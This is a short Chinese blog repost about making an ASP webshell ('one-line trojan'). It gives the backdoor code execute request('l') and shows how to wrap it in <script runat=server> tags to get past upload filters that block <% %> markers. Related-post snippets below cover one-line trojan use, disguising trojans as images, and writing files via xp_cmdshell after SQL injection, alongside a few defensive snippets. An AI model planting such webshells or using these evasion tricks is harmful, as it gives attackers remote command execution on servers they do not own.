插入ASP代码让网站ASP木马

转载 2007年09月22日 23:25:00

不过在上传代码过程中,许多网页程序都不允许包含〈%%〉标记符号的内容的文件上传。

这样就有好多SHELL不能上传上去了。可以采用下面的方法解决。以蓝屏最小ASP木马为例。

首先:原程序代码是:

〈%execute request("l")%〉

我们可以把它的标签换下来。

然后改成:

<scriptlanguage=VBScript runat=server>execute request("l")</Script>

这样就避开了使用〈%%〉,保存为.ASP,程序同样执行。 

一句话木马的原理及利用分析(asp,aspx,php,jsp)

一句话木马的适用环境: 1.服务器的来宾账户有写入权限 2.已知数据库地址且数据库格式为asa或asp 3.在数据库格式不为asp或asa的情况下,如果能将一句话插入到asp文件中也可 ...
  • xysoul
  • xysoul
  • 2015年03月20日 13:59
  • 1822

asp一句话木马原理

一句话木马入侵原理 是典型的一句话木马服务端代码,将这个代码写入asp文件,就成了一句话木马服务端文件。  仔细观察一下这句代码,括号里的“#”是我们一句话的密码,我们可以把它改成任意字符,这样可以...
  • JackLiu16
  • JackLiu16
  • 2017年11月10日 16:53
  • 211

图片木马制作的三种方法

1.Copy命令制作 1.asp内容: 打开cmd,数据一下命令: 此时打开两个jpg文件,相比: 且打开2.jpg可以像1.j...
  • whatday
  • whatday
  • 2017年01月25日 21:36
  • 7046

怎么防范ASP木马Webshell

1、首先我们来看看一般ASP木马、Webshell所利用的ASP组件有那些?我们以海洋木马为列:      <object runat="server" id="ws" scope="pa...
  • u012971242
  • u012971242
  • 2013年12月04日 09:45
  • 303

IIS如何防ASP木马

IIS是Internet Information Server的简称。IIS作为当今流行的Web服务器之一,提供了强大的Internet和Intranet服务功能,然而在ASP木马程序泛滥的今天,如何...
  • yushijie
  • yushijie
  • 2013年06月21日 12:08
  • 1150

如何区分上传的图片是不是木马?

这里所说的表示不同文件类型的魔术数字,指定是文件的最开头的几个用于唯一区别其它文件类型的字节,有了这些魔术数字,我们就可以很方便的区别不同的文件,这也使得编程变得更加容易,因为我减少了我们用于区别一个...
  • Lenny_CL
  • Lenny_CL
  • 2017年02月13日 10:59
  • 542

asp.net使用DataSet数据集插入记录

http://blog.csdn.net/beyondqd/article/details/6724778 http://blog.163.com/da7_1@126/blog/static/104...
  • QZC295919009
  • QZC295919009
  • 2015年01月21日 11:22
  • 1614

怎么利用asp木马取得管理权限

前段时间泛滥成灾的动网论坛上传漏洞以及最近接二连三的各种asp系统暴露的上传漏洞,可能很多朋友手中有了很多webshell的肉鸡,至于选择怎么样这些小鸡的方式也是因人而异,有人继续提升权限,进一步入侵...
  • u012971242
  • u012971242
  • 2013年11月27日 11:51
  • 636

SQL注入与ASP木马上传

SQL注入后,如何上传木马,一直是比较头疼的事,我这里提供上传木马的一种另一种方法。 1、SQL注入的时候,用xp_cmdshell 向服务器上写入一个能写文件的asp文件。 文件内容: S...
  • h2718616003
  • h2718616003
  • 2016年02月07日 19:34
  • 138

SQL注入与ASP木马上传

SQL注入后,如何上传木马,一直是比较头疼的事,我这里提供上传木马的一种另一种方法。 1、SQL注入的时候,用xp_cmdshell 向服务器上写入一个能写文件的asp文件。 文件内容: S...
  • oMingZi12345678
  • oMingZi12345678
  • 2013年06月07日 11:40
  • 1256
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:插入ASP代码让网站ASP木马
举报原因:
原因补充:

(最多只允许输入30个字)